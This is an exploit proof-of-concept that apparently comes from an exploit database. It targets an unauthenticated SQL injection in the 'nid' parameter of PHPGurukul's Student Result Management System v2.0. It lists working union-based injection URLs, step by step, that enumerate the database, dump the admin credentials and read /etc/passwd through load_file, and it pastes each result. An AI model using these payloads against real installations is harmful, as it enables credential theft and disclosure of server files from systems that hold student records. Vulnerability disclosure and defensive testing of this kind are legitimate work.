# Exploit Title: Student Result Management System v2.0 Unauthenticated
SQL Injection / Local File Inclusion
# Date: 2025-08-22
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/student-result-management-system/
# Demo Site: http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/
# Tested on: Arch Linux
# CVE: N/A

PoC:
Click on an article on the notice board at random and parameter 'nid' is
vulnerable to union-based sql injection
1-  for version information
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,version(),3,4-- -
10.11.7-MariaDB-42- get databases on the server
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -

information_schemasrms

3-  tables in the srms database

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE
table_schema='srms'-- -
admintblnoticetblstudents
4- get columns in table admin

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE
table_name='admin'-- -

UserNamePassword

5- dump data

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION ALL SELECT 1,concat(UserName,":",Password),3,4 FROM srms.admin-- -
admin:f925916e[REDACTED]533251

6- get local file (/etc/passwd)

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,load_file('/etc/passwd'),3,4 FROM srms.admin-- -

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ....